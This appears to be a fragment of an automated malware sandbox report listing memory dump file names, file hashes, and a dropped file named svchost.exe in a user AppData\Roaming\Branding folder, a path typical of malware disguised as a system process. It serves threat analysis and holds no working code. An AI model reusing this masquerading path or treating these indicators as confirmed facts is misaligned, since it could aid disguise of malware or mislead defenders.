SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2420-12-0x00007FF8DA3A0000-0x00007FF8DAE61000-memory.dmp

memory/2420-13-0x00007FF8DA3A0000-0x00007FF8DAE61000-memory.dmp

memory/2420-14-0x00007FF8DA3A0000-0x00007FF8DAE61000-memory.dmp

memory/2420-15-0x00007FF8DA3A0000-0x00007FF8DAE61000-memory.dmp

memory/2420-18-0x00007FF8DA3A0000-0x00007FF8DAE61000-memory.dmp

memory/3336-20-0x00007FF8DA3A3000-0x00007FF8DA3A5000-memory.dmp

memory/3336-21-0x00007FF8DA3A0000-0x00007FF8DAE61000-memory.dmp

C:\Users\Admin\AppData\Roaming\Branding\svchost.exe

MD5 161cd662c124f1408ccbd57a752a8d5f
SHA1 7baad97316f0cbf1b35d9b0b2b3a8d19da852d41
SHA256 61c5f76ed94eb63ad3a50b8225f2e795c7c6461e5f40bacb4ad8cadab276748e
SHA512 ea72216157d4d502febc230700f4fd4279d7aab469a3b44cbafc99730df9431cbb9f64d0ab3e9d239a4faa869aa055a06198622b07a1f0408cfebdc9e23b20ac

memory/3336-33-0x00007FF8DA3A0000-0x00007FF8DAE61000-memory.dmp